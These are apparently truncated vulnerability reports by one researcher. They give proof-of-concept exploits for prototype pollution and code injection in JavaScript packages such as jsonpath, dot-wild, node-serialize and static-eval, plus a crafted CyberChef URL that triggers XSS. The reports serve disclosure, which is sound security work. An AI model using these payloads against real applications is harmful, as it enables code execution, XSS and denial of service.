Posix
Posix
## poc ```js var jp = require('jsonpath'); var data = [{}] var names = jp.query(data, `$..[?( ({})['__proto__']['__defineGetter__']('toString', ({})['constructor']) )]`); const express = require('express'); const app = express(); app.get('/', (req, res)...
dot-wild has prototype pollution vulnerablity and it may lead to logic vulnerability or DOS in application ```js const dot = require('dot-wild'); dot.set({}, '__proto__.polluted', true); console.log(polluted); // true ```
**Describe the bug** Here's post about the bug. https://blog.p6.is/writeups-for-hayyim-security-ctf-2022/ **To Reproduce** Go to the link below ``` https://gchq.github.io/CyberChef/#recipe=JPath_expression('$..%5B?((%7B__proto__:%5B%5D.constructor%7D).constructor(%22self.postMessage(%7Baction:%5C'bakeComplete%5C',data:%7BbakeId:1,dish:%7Btype:1,value:%5C'%5C'%7D,duration:1,error:false,id:undefined,inputNum:2,progress:1,result:%5C'%3Ciframe/onload%3Dalert(1337)%3E%5C',type:%20%5C'html%5C'%7D%7D);%22)();)%5D','%5C%5Cn')&input=W3t9XQ ``` Then you can see 1337 pops up. **Expected behaviour** No bug....
This module has prototype pollution vulnerablity and it can make logic vulnerability in application using ```js const serialize = require('node-serialize'); var obj = JSON.parse(`{"__proto__": {"polluted": true}}`); let serialized = serialize.serialize(obj);...
## poc ```js // make pollution const evaluate = require('static-eval'); const parse = require('esprima').parse; var src = `({})['__proto__']['__defineGetter__']('toString', ({})['constructor'])` var ast = parse(src).body[0].expression; evaluate(ast); // serve webapp const express =...